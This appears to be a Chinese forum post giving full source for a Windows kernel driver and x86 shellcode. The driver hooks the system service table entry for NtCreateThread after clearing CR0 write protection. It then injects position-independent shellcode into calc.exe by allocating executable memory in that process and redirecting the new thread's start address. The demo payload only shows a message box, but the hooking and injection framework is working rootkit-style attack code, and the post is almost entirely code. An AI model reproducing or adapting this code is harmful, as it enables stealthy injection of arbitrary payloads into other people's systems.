LoadShell.Asm- .686p
- .model flat,StdCall
- option casemap:none
- .code
- CODE_START:
- dwEntry dd 0
- start:
- push edx
- pushad
- pushfd
- call CODE_ADDR
- CODE_ADDR:
- pop ebx
- sub ebx, CODE_ADDR
- call GetKernel32Base
- lea edx, [ebx + szLoadLibrary]
- push edx
- push eax
- call GetApiAddr
- lea edx, [ebx + szUser]
- push edx
- call eax
- lea edx, [ebx + szMessageBox]
- push edx
- push eax
- call GetApiAddr
- push 0
- push 0
- push 0
- push 0
- call eax
- lea edx, [ebx + dwEntry]
- mov edx, [edx]
- mov [esp + 024h], edx
- popfd
- popad
- ret
-
- szUser db 'user32.dll',0
- szLoadLibrary db 'LoadLibraryA',0
- szMessageBox db 'MessageBoxA',0
-
- GetKernel32Base proc
- assume fs:nothing
- mov eax, [fs:30h]
- mov eax, [eax + 0ch]
- mov eax, [eax + 0ch]
- mov eax, [eax]
- mov eax, [eax]
- mov eax, [eax + 018h]
- ret
- GetKernel32Base endp
-
- GetNtdllBase proc
- assume fs:nothing
- mov eax, [fs:30h]
- mov eax, [eax + 0ch]
- mov eax, [eax + 0ch]
- mov eax, [eax]
- mov eax, [eax + 018h]
- ret
- GetNtdllBase endp
-
- GetApiAddr proc hModule:DWORD, lpProcName:DWORD
- push ebx
- push ecx
- push edx
- push edi
- push esi
- mov eax, hModule
- mov ebx, [eax + 3ch]
-
- push [ebx + eax + 7ch]
- mov ebx, [ebx + eax + 78h]
- push ebx
-
- add ebx, eax
- mov edi, lpProcName
- mov edx, [ebx + 10h]
- test edi, 0FFFF0000h
- jz next
- xor eax, eax
-
- _LABEL:
- cmp eax, [ebx + 18h]
- jae error
-
- push edi
- mov esi, [ebx + 8 * 4]
- add esi, hModule
- mov esi, [esi + eax * 4]
- add esi, hModule
- again:
- mov cl, byte ptr[esi]
- mov ch, byte ptr[edi]
- test cl, cl
- jz cmpend
-
- inc esi
- inc edi
- cmp cl, ch
- jz again
- or cl, 20h
- cmp cl, ch
- jz again
- cmpend:
- inc eax
- pop edi
- cmp cl, ch
- jnz _LABEL
-
- cmp eax, [ebx + 14h]
-
- mov edi, eax
- mov eax, hModule
- jmp go
- normal:
- jmp END_PROC
- next:
- go:
- sub edi, edx
- cmp edi, [ebx + 14h]
- ja error
- mov ebx, [ebx + 7 * 4]
- add ebx, hModule
- mov ebx, [ebx + 4 * edi]
- add eax, ebx
- add esp, 8
- jmp END_PROC
- error:
- xor eax, eax
- END_PROC:
- pop esi
- pop edi
- pop edx
- pop ecx
- pop ebx
- ret
- GetApiAddr endp
- CODE_END:
- GetShellInfo proc lpStart:DWORD, lpSize:DWORD
- .if lpStart == 0
- ret
- .endif
- .if lpSize == 0
- ret
- .endif
-
- mov eax, CODE_END
- sub eax, CODE_START
- mov ebx, lpSize
- mov [ebx], eax
- mov eax, CODE_START
- mov ebx, lpStart
- mov [ebx], eax
- ret
-
- GetShellInfo endp
- end start
-
复制代码 Driver.h- #ifdef __cplusplus
- extern "C"
- {
- #endif
- #include <ntifs.h>
- NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath);
- #ifdef __cplusplus
- }
- #endif
- #define PAGEDCODE code_seg("PAGE")
- #define LOCKEDCODE code_seg()
- #define INITCODE code_seg("INIT")
- #define PAGEDDATA data_seg("PAGE")
- #define LOCKEDDATA data_seg()
- #define INITDATA data_seg("INIT")
- #define arraysize(p) (sizeof(p)/sizeof((p)[0]))
- VOID DriverUnload(IN PDRIVER_OBJECT DriverObject);
- typedef struct _INITIAL_TEB {
- struct {
- PVOID OldStackBase;
- PVOID OldStackLimit;
- } OldInitialTeb;
- PVOID StackBase;
- PVOID StackLimit;
- PVOID StackAllocationBase;
- } INITIAL_TEB, *PINITIAL_TEB;
- NTSTATUS MyNtCreateThread(
- __out PHANDLE ThreadHandle,
- __in ACCESS_MASK DesiredAccess,
- __in_opt POBJECT_ATTRIBUTES ObjectAttributes,
- __in HANDLE ProcessHandle,
- __out PCLIENT_ID ClientId,
- __in PCONTEXT ThreadContext,
- __in PINITIAL_TEB InitialTeb,
- __in BOOLEAN CreateSuspended
- );
- typedef NTSTATUS (*pNtCreateThread)(
- __out PHANDLE ThreadHandle,
- __in ACCESS_MASK DesiredAccess,
- __in_opt POBJECT_ATTRIBUTES ObjectAttributes,
- __in HANDLE ProcessHandle,
- __out PCLIENT_ID ClientId,
- __in PCONTEXT ThreadContext,
- __in PINITIAL_TEB InitialTeb,
- __in BOOLEAN CreateSuspended
- );
- EXTERN_C NTKERNELAPI UCHAR * PsGetProcessImageFileName(
- __in PEPROCESS Process
- );
- #pragma pack(1)
- typedef struct ServiceDescriptorEntry {
- unsigned int *ServiceTableBase;
- unsigned int *ServiceCounterTableBase; //仅适用于checked build版本
- unsigned int NumberOfServices;
- unsigned char *ParamTableBase;
- } ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
- #pragma pack()
- extern "C" PServiceDescriptorTableEntry_t KeServiceDescriptorTable;
- ULONG GetSDDTAddr(ULONG uIndex);
- BOOLEAN HookSSDT(ULONG uIndex, ULONG uNewAddr);
- BOOLEAN UnHookSSDT(ULONG uIndex, ULONG uOldAddr);
复制代码 Driver.cpp- #include "Driver.h"
- //global
- pNtCreateThread g_pfnRealNtCreateThread = NULL;
- BOOLEAN g_bHookDll = FALSE;
- void PageProtectOn()
- {
- //恢复内存保护
- __asm
- {
- mov eax, cr0
- or eax, 10000h
- mov cr0, eax
- sti
- }
- }
- void PageProtectOff()
- {
- //去掉内存保护
- __asm
- {
- cli
- mov eax, cr0
- and eax, not 10000h
- mov cr0, eax
- }
- }
- BOOLEAN MyNtWriteProcessMemory(PVOID BaseAddress, PVOID Buffer ,ULONG uBufferSize, HANDLE hProcess)
- {
- PEPROCESS Eprocess = NULL;
- NTSTATUS status = ObReferenceObjectByHandle(hProcess, PROCESS_ALL_ACCESS, NULL, KernelMode, (PVOID *)&Eprocess, NULL);
- if (!NT_SUCCESS(status))
- {
- return FALSE;
- }
- KAPC_STATE ApcState;
- KeStackAttachProcess(Eprocess, &ApcState);
- __try
- {
- ProbeForWrite(BaseAddress, uBufferSize, sizeof(UCHAR));
- RtlCopyMemory(BaseAddress, Buffer, uBufferSize);
- KeUnstackDetachProcess(&ApcState);
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- KeUnstackDetachProcess(&ApcState);
- return FALSE;
- }
- return TRUE;
- }
- EXTERN_C VOID GetShellInfo(PULONG puStartAddr, PULONG puSize);
- NTSTATUS MyNtCreateThread(
- __out PHANDLE ThreadHandle,
- __in ACCESS_MASK DesiredAccess,
- __in_opt POBJECT_ATTRIBUTES ObjectAttributes,
- __in HANDLE ProcessHandle,
- __out PCLIENT_ID ClientId,
- __in PCONTEXT ThreadContext,
- __in PINITIAL_TEB InitialTeb,
- __in BOOLEAN CreateSuspended
- )
- {
- if (!g_bHookDll)
- {
- PUCHAR pszName = PsGetProcessImageFileName(IoGetCurrentProcess());
- if (_stricmp((char *)pszName, "calc.exe") == 0)
- {
- ULONG uShellStart = 0;
- ULONG uShellSize = 0;
- GetShellInfo(&uShellStart, &uShellSize);
- if (uShellStart == 0 || uShellSize == 0)
- {
- goto GOON;
- }
- PVOID puShellCodeVa;
- puShellCodeVa = NULL;
- ULONG uShellCodeSize = uShellSize;
- NTSTATUS status = ZwAllocateVirtualMemory(ProcessHandle, &puShellCodeVa, NULL, &uShellCodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- if (!NT_SUCCESS(status))
- {
- goto GOON;
- }
- ULONG uEntryEip = ThreadContext->Eax;
- BOOLEAN bRet = FALSE;
- bRet = MyNtWriteProcessMemory(puShellCodeVa, &uEntryEip, sizeof(ULONG), ProcessHandle);
- if (!bRet)
- {
- goto GOON;
- }
- bRet = MyNtWriteProcessMemory((PVOID)((ULONG)puShellCodeVa + sizeof(ULONG)), (PVOID)(uShellStart + sizeof(ULONG)), uShellSize, ProcessHandle);
- if (!bRet)
- {
- goto GOON;
- }
-
- ThreadContext->Eax = ((ULONG)puShellCodeVa + sizeof(ULONG));
- g_bHookDll = TRUE;
- }
- }
-
- GOON:
- return g_pfnRealNtCreateThread(ThreadHandle,
- DesiredAccess,
- ObjectAttributes,
- ProcessHandle,
- ClientId,
- ThreadContext,
- InitialTeb,
- CreateSuspended);
- }
- #pragma PAGEDCODE
- ULONG GetSDDTAddr(ULONG uIndex)
- {
- ULONG uAddr = (ULONG)KeServiceDescriptorTable->ServiceTableBase[uIndex];
- return uAddr;
- }
- BOOLEAN HookSSDT(ULONG uIndex, ULONG uNewAddr)
- {
- if (uNewAddr == 0)
- {
- return FALSE;
- }
- PageProtectOff();
- KeServiceDescriptorTable->ServiceTableBase[uIndex] = uNewAddr;
- PageProtectOn();
- return TRUE;
- }
- BOOLEAN UnHookSSDT(ULONG uIndex, ULONG uOldAddr)
- {
- if (uOldAddr == 0)
- {
- return FALSE;
- }
- PageProtectOff();
- KeServiceDescriptorTable->ServiceTableBase[uIndex] = uOldAddr;
- PageProtectOn();
- return TRUE;
- }
- #pragma INITCODE
- NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
- {
- NTSTATUS status = STATUS_SUCCESS;
-
- ULONG uAddr = GetSDDTAddr(53);
- if (uAddr)
- {
- g_pfnRealNtCreateThread = (pNtCreateThread)uAddr;
- HookSSDT(53, (ULONG)MyNtCreateThread);
- }
- DriverObject->DriverUnload = DriverUnload;
- return status;
- }
- #pragma PAGEDCODE
- VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
- {
-
- UnHookSSDT(53, (ULONG)g_pfnRealNtCreateThread);
- KdPrint(("DriverEntry unLoading...\n"));
-
- }
复制代码 |